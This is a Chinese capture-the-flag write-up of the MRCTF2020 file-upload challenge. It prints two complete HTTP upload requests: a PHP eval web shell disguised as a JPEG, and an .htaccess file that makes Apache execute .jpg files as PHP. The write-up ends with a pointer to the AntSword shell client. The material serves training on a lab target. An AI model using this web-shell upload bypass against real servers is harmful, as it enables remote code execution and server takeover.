[MRCTF2020]你传你呢

打开题目如下。

本题有坑点，就算是使用 mspaint 随意生成一个 jpg 图片进行上传，仍然提示：我扌your problem?。后面查看了 wp，发现是对上传内容的大小存在限制。
经尝试，使用 php、phtml、php5 等多种后缀都无法绕过检测，但可以上传 .htaccess 文件（.htaccess 是 Apache 使用的一种配置文件，可以定义 Apache 对该目录及子目录下的文件的解析方式，如 .jpg 文件可以指定视作 php 文件进行解析。

POST /upload.php HTTP/1.1
Host: 58ab749f-7e26-4f2f-931c-da223b1e7d15.node4.buuoj.cn:81
Content-Length: 320
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://58ab749f-7e26-4f2f-931c-da223b1e7d15.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypMRMh8WIkigVRbgs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://58ab749f-7e26-4f2f-931c-da223b1e7d15.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6dc018d803ac639489f503974b105ff7
Connection: close

------WebKitFormBoundarypMRMh8WIkigVRbgs
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg

<?php
@eval($_POST['cmd']);
?>
------WebKitFormBoundarypMRMh8WIkigVRbgs
Content-Disposition: form-data; name="submit"

一键去世
------WebKitFormBoundarypMRMh8WIkigVRbgs--

POST /upload.php HTTP/1.1
Host: 58ab749f-7e26-4f2f-931c-da223b1e7d15.node4.buuoj.cn:81
Content-Length: 365
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://58ab749f-7e26-4f2f-931c-da223b1e7d15.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypMRMh8WIkigVRbgs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://58ab749f-7e26-4f2f-931c-da223b1e7d15.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6dc018d803ac639489f503974b105ff7
Connection: close

------WebKitFormBoundarypMRMh8WIkigVRbgs
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg

<IfModule mime_module>
AddType application/x-httpd-php .jpg
</IfModule>
------WebKitFormBoundarypMRMh8WIkigVRbgs
Content-Disposition: form-data; name="submit"

一键去世
------WebKitFormBoundarypMRMh8WIkigVRbgs--

随后根据响应包的内容，找到对应的 jpg 文件，使用蚁剑连接即可。

本栏目推荐文章
• mrctf2020_easyoverflow
• CVE-2020-11800
• 【LeetCode 1635. Hopper 公司查询 I】with recursive生成2020年每月的最后一天
• 2020-2021 ACM-ICPC, Asia Seoul Regional Contest
• [ACTF2020 新生赛]Exec 1
• wustctf2020_getshell_2
• P6646 [CCO2020] Shopping Plans
• bjdctf_2020_router
• 题解 P7165 [COCI2020-2021#1] Papričice
• mrctf2020_shellcode

MRCTF 2020mrctf 2020 ez_bypass bypass mrctf 2020 mrctf ezpop 2020 easyoverflow mrctf 2020 cyberpunk mrctf 2020 transform mrctf 2020 shellcode mrctf 2020 套路mrctf 2020 mrctf 2020 web mrctf